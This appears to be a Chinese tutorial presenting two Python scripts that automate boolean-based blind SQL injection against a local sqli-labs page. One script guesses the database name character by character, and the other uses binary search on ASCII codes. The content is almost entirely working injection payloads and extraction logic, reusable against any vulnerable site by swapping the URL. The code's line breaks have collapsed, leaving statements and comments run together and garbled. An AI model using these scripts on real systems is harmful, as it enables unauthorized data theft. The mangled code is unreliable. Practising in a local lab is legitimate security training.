用python实现自动化布尔盲注

方法一（直接使用字符盲注）

import requests#目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"#要推断的数据库信息（例如：数据库名）
database_name = ""#字符集（可以根据需要扩展）
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "#推断数据库名的长度def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0#推断数据库名def get_database_name(length):db_name = ""for i in range(1, length + 1):for char in charset:  payload = f"1' AND (SELECT substring(database(), {i}, 1) = '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:db_name += charbreak  # 找到正确字符后跳出内层循环return db_name#主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

方法二（二分查找–利用Ascii将其转化为数字进行盲注）

import requests
import time# 配置目标URL和检测信息
BASE_URL = "http://127.0.0.1/sqli/Less-8/index.php"
SUCCESS_MESSAGE = "You are in..........."
MAX_LENGTH = 50  # 最大长度限制
DELAY = 0.1  # 请求间隔(秒)
ASCII_MIN = 32  # 空格字符
ASCII_MAX = 126  # 波浪线字符def check_injection(url, payload):"""发送请求并检查是否注入成功"""try:response = requests.get(url, params={"id": payload})time.sleep(DELAY)  # 避免请求过快return SUCCESS_MESSAGE in response.textexcept requests.RequestException as e:print(f"请求出错: {e}")return Falsedef binary_search(url, payload_template, min_val, max_val):"""使用二分查找确定ASCII值"""low, high = min_val, max_valwhile low <= high:mid = (low + high) // 2# 检查是否等于中间值eq_payload = payload_template.format(operator="=", value=mid)if check_injection(url, eq_payload):return mid# 检查是否小于中间值lt_payload = payload_template.format(operator="<", value=mid)if check_injection(url, lt_payload):high = mid - 1else:low = mid + 1return -1  # 未找到匹配值def get_database_length(url):"""使用二分查找获取数据库名长度"""print("正在获取数据库名长度...")low, high = 1, MAX_LENGTHwhile low <= high:mid = (low + high) // 2payload = f"1' AND (SELECT length(database()) = {mid}) -- "if check_injection(url, payload):print(f"数据库名长度: {mid}")return midpayload_lt = f"1' AND (SELECT length(database()) < {mid}) -- "if check_injection(url, payload_lt):high = mid - 1else:low = mid + 1print("无法确定数据库名长度")return 0def get_database_name(url, length):"""使用二分查找获取数据库名"""print("正在获取数据库名...")db_name = ""payload_template = "1' AND (SELECT ASCII(SUBSTRING(database(), {pos}, 1)) {{operator}} {{value}}) -- "for pos in range(1, length + 1):formatted_template = payload_template.format(pos=pos)ascii_code = binary_search(url, formatted_template, ASCII_MIN, ASCII_MAX)if ascii_code != -1:db_name += chr(ascii_code)print(f"已获取字符 {pos}/{length}: {db_name}")return db_namedef main():"""主函数"""print(f"开始对 {BASE_URL} 进行SQL注入测试")# 获取数据库名db_length = get_database_length(BASE_URL)if db_length <= 0:print("无法获取数据库信息，退出")returndb_name = get_database_name(BASE_URL, db_length)print(f"数据库名: {db_name}")if __name__ == "__main__":main()